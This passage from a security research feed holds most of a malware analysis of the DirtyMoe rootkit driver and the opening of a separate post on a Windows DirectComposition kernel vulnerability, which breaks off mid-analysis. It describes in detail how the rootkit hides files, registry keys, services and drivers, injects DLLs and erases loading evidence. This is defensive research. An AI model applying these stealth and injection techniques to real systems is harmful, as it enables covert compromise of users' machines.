Driver names	listBaseDllName	Defines a list of drivers that should be hidden in the system; see Driver Hiding.
Service names	listServices	Specifies a list of services that should be hidden in the system; see Service Hiding.

Table 4. White and Black lists

Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function	Variable	Description
File Writing (Shutdown)	filename1_for_ShutDown data1_for_ShutDown	Defines a file name and data for the first file written during the driver shutdown.
	filename2_for_ShutDown data2_for_ShutDown	Defines a file name and data for the second file written during the driver shutdown.
Registry Writing (Shutdown)	regKey1_shutdown regValue1_shutdown regData1_shutdown regType1	Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
	regKey2_shutdown regValue2_shutdown regData2_shutdown regType2	Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing	filePath	Determines filename which will be used to write data; see Controlling IOCTL `0x2224C8`.
Registry Writing	regKey regValue regType	Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.); see Controlling IOCTL `0x2224C0`.
Unknow (unused)	dwWinDevicePathA dwWinDeviceDataA	Keeps a path and data for file A.
	dwWinDevicePathB dwWinDeviceDataB	Keeps a path and data for file B.

Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function	Variable	Description
Process to Inject	dwWinDriverMaker2 dwWinDriverMaker2_2	Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
	dwWinDriverMaker1 dwWinDriverMaker1_2	Defines two process names that should be injected if the process is created.
DLL to Inject	dwWinDriverPath1 dwWinDriverDataA	Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
	dwWinDriverPath1_2 dwWinDriverDataA_2	Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
	dwWinDriverPath2 dwWinDriverDataB	Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
	dwWinDriverPath2_2 dwWinDriverDataB_2	Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.

Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requested process is not present in whitelists. There are two whitelists. The first whitelists (Process ID and File names) cause that the QueryDirectory results are not modified if the process ID or process image file name, requesting the given I/O operation (QueryDirectory), is present in the whitelists. It represents malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. It ensures that the whitelisted files are not visible for non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file for the user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g, Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

**Figure 1**. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process ID, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the white list. It is double protection. The blacklist is focused on processing image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

**Figure 2**. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds an address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for CM_KEY_CONTROL_BLOCK, and its associated HHIVE structured correspond with the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

**Figure 3**. Overwriting GetCellRoutine

This method’s pitfall is that offsets of looked structure, variable, or method are specific for each windows version or build. So, the driver must determine on which Windows version the driver runs.

The MalGetCellRoutine() hook method performs 3 basic operations as follow:

The driver calls the original kernel GetCellRoutine() method.
Checks whitelists for a requested registry key.
Catches or releases the requested registry key according to the whitelist check.

Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across a whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the interaction is at the end of the HIVE, the driver does not return the last key since it was returned before, but it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the request key only for regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Device Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and Create flag. The driver affects only threads in which Create flag is set to TRUE, so only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

**Figure 4.** Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segments from the address of the ZwAllocateVirtualMemory() and looks up for instructions representing the constant move to eax (e.g. mov eax, ??h). It identifies the VirtualMemory methods; see Table 7 for constants.

Constant	Method
0x18	`ZwAllocateVirtualMemory`
0x23	`ZwQueryVirtualMemory`
0x3A	`NtWriteVirtualMemory`
0x50	`ZwProtectVirtualMemory`

Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constants is found, the final address of a lookup method is calculated as follow:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find methods can be summarized as follow:

Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
Each sought method contains a specific constant on a specific address (constant_address).
If the constant_address is found, another specific offset (alignment_constant) is subtracted;
the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method is shown in Figure 5.

**Figure 5.** Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. The APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. It is called periodically. The driver rewrites the instructions of the NtTestAlert() which jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step to the process injection is to find free memory for a code cave. The driver finds the free memory near the NtTestAlert() routine address. The code cave includes a shellcode as Figure 6. demonstrates.

**Figure 6.** Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code into the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with the instruction which just jumps to the shellcode. It causes that when the NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32bit variant of the LdrLoadDll() method. It uses the similar technique described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the process services.exe and attach it to this one via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe keeps all run services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks required services defined by listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via Windows Event Log. Therefore, we can enumerate all regular services and all logged services. Then, we can create differences to find hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on the IOCTL from the user-mode. The Driver Entry is initiated by a parameter representing a driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY as a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. A driver image is not permanently stored on a disk since the service always extracts, loads, and deletes the driver images on the service startup. The secondary service aim is to eliminate evidence about driver loading and eventually complicate a forensic analysis. The service aspires to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328AppRegistry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name> ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain ServiceType: SERVICE_WIN32_SHARE_PROCESS ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328 ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is the Windows common naming convention. Moreover, ImagePath prefixed with dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during the Windows crash. The malware tries to use the virtual driver name convention not to be so conspicuous. The principle of the Dump Memory using the virtual drivers is described in [7, 8].

ImagePath values are different from each windows reboot, but it always abuses the name of the system native driver; see a few instances collected during windows boot: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via the API call. Therefore, a forensics track can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes a relevant HIVE pointer, but unreferenced data is still present in the HIVE stored on the disk. Hence, we can read removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing driver image and register keys

The malware service is responsible for the driver loading and cleans up of loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached if a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) has a call stack that contains the kernel call for driver loading, but the corresponding service has been killed by EIP registry modifying. The process (service) was killed, and the whole Windows ended in BSoD. Windows made a crash dump, so the file system caches have been flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount a volume and read all wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers must be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates since this topic is really wide. The backward compatibility but also a potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misuse, etc. [10]. Although all certificates have been revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements the authorization instrument, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access and what should not get to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked if the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads arbitrary DLL into the new thread.

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in HIVE. The code execution of the hook method is redirected to the malicious routine so that the driver can control the indexing of registry keys. Actually, the driver can select which keys will be indexed or not.

Service and Driver Hiding

Patching of specific kernel structures causes that certain API functions do not enumerate all system services or loaded drivers. Windows services and drivers are stored as a double-linked list in the kernel. The driver corrupts the kernel structures so that malicious services and drivers are unlinked from these structures. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself in the driver if knowing the authorization code. After successful registration, the malware can use a wide range of driver functionality. Hypothetically, the authorization code is hardcoded, and the driver’s name can be derived so we can communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handler of the driver file, so the file manipulation with the driver file is limited. However, the driver removes its own file using kernel-call. Therefore, the driver file is removed from the file system cache, and the driver handler is still relevant, with the difference that the driver file does not exist, including its forensic traces.

The DirtyMoe malware is written using Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. We analyzed that most of the driver functionalities are downloaded from internet forums as public samples. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signature certificates that are used have been revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates have been signed by the certification authority which Microsoft trusts, so the certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of the code-signature certificates in the future post.

6. Conclusion

DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionally of the DirtyMoe driver and evaluate the impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, the ability to conceal, deployment, and code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous action of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements the minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden for users. An implication of this finding is that malware itself and its artifacts are hidden even for AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt out and investigate other samples that have been signed by the revoked certificates. Because of this, the malware author can be traced and identified using thus abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1 AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05 B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080 CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9 EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2 \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2

Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl; \WINDOWS\AppPatch\Ke237043.xsl; \WINDOWS\AppPatch\Ke311799.xsl; \WINDOWS\AppPatch\Ke119163.xsl; \WINDOWS\AppPatch\Ke531580.xsl; \WINDOWS\AppPatch\Ke856583.xsl; \WINDOWS\AppPatch\Ke999860.xsl; \WINDOWS\AppPatch\Ke410472.xsl; \WINDOWS\AppPatch\Ke673389.xsl; \WINDOWS\AppPatch\Ke687417.xsl; \WINDOWS\AppPatch\Ke689468.xsl; \WINDOWS\AppPatch\Ac312B9050.sdb; \WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb; C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Analysis of DirectComposition Binding and Tracker object vulnerability

iamelli0t’s blog

["iamelli0t"]

15 August 2021 at 00:00

DirectComposition introduction

Microsoft DirectComposition is a Windows component that enables high-performance bitmap composition with transforms, effects, and animations. Application developers can use the DirectComposition API to create visually engaging user interfaces that feature rich and fluid animated transitions from one visual to another.[1]

DirectComposition API provides COM interface via dcomp.dll, calls win32kbase.sys through win32u.dll export function, and finally sends data to client program dwm.exe (Desktop Window Manager) through ALPC to complete the graphics rendering operation:
avatar

win32u.dll (Windows 10 1909) provides the following export functions to handle DirectComposition API:
avatar

The three functions related to trigger vulnerability are: NtDCompositionCreateChannel，NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel:
(1) NtDCompositionCreateChannel creates a channel to communicate with the kernel:

typedef NTSTATUS(*pNtDCompositionCreateChannel)(
	OUT PHANDLE hChannel,
	IN OUT PSIZE_T pSectionSize,
	OUT PVOID* pMappedAddress
	);

(2) NtDCompositionProcessChannelBatchBuffer batches multiple commands:

typedef NTSTATUS(*pNtDCompositionProcessChannelBatchBuffer)(
    IN HANDLE hChannel,
    IN DWORD dwArgStart,
    OUT PDWORD pOutArg1,
    OUT PDWORD pOutArg2
    );

The batched commands are stored in the pMappedAddress memory returned by NtDCompositionCreateChannel. The command list is as follows:

enum DCOMPOSITION_COMMAND_ID
{
	ProcessCommandBufferIterator,
	CreateResource,
	OpenSharedResource,
	ReleaseResource,
	GetAnimationTime,
	CapturePointer,
	OpenSharedResourceHandle,
	SetResourceCallbackId,
	SetResourceIntegerProperty,
	SetResourceFloatProperty,
	SetResourceHandleProperty,
	SetResourceHandleArrayProperty,
	SetResourceBufferProperty,
	SetResourceReferenceProperty,
	SetResourceReferenceArrayProperty,
	SetResourceAnimationProperty,
	SetResourceDeletedNotificationTag,
	AddVisualChild,
	RedirectMouseToHwnd,
	SetVisualInputSink,
	RemoveVisualChild
};

The commands related to trigger vulnerability are: CreateResource, SetResourceBufferProperty, ReleaseResource. The data structure of different commands is different:
avatar

(3) NtDCompositionCommitChannel serializes batch commands and sends them to dwm.exe for rendering through ALPC:

typedef NTSTATUS(*pNtDCompositionCommitChannel)(
	IN HANDLE hChannel,
	OUT PDWORD out1,
	OUT PDWORD out2,
	IN DWORD flag,
	IN HANDLE Object
	);

CInteractionTrackerBindingManagerMarshaler::SetBufferProperty process analysis

First use CreateResource command to create CInteractionTrackerBindingManagerMarshaler resource (ResourceType = 0x59, hereinafter referred to as “Binding”) and CInteractionTrackerMarshaler resource (ResourceType = 0x58, hereinafter referred to as “Tracker”).
Then call the SetResourceBufferProperty command to set the Tracker object to the Binding object’s BufferProperty.
This process is handled by the function CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, which main process is as follows:
avatar

The key steps are as follows:
(1) Check the input buffer subcmd == 0 && bufsize == 0xc
(2) Get Tracker objects tracker1 and tracker2 from channel-> resource_list (+0x38) according to the resourceId in the input buffer
(3) Check whether the types of tracker1 and tracker2 are CInteractionTrackerMarshaler (0x58)
(4) If binding->entry_count (+0x50) > 0, find the matched TrackerEntry from binding->tracker_list (+0x38) according to the handleID of tracker1 and tracker2, then update TrackerEntry->entry_id to the new_entry_id from the input buffer
(5) Otherwise, create a new TrackerEntry structure. If tracker1->binding == NULL || tracker2->binding == NULL, update their binding objects

After SetBufferProperty, a reference relationship between the binding object and the tracker object is as follows:
avatar

When use ReleaseResource command to release the Tracker object, the CInteractionTrackerMarshaler::ReleaseAllReferencescalled function is called. ReleaseAllReferences checks whether the tracker object has a binding object internally:
avatar

If it has:
(1) Call RemoveTrackerBindings. In RemoveTrackerBindings, TrackerEntry.entry_id is set to 0 if the resourceID in tracker_list is equal to the resourceID of the freed tracker. Then call CleanUpListItemsPendingDeletion to delete the TrackerEntry which entry_id=0 in tracker_list:
avatar

(2) Call ReleaseResource to set refcnt of the binding object minus 1.
avatar

(3) tracker->binding (+0x190) = 0

According to the above process, the input command buffer to construct a normal SetBufferProperty process is as follows:
avatar

After SetBufferProperty, the memory layout of binding1 and tacker1, tracker2 objects is as follows:
avatar

After ReleaseResource tracker2, the memory layout of binding1, tacker1, and tracker2 objects is as follows:
avatar

CVE-2020-1381

Retrospective the process of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, when new_entry_id != 0, a new TrackerEntry structure will be created:
avatar

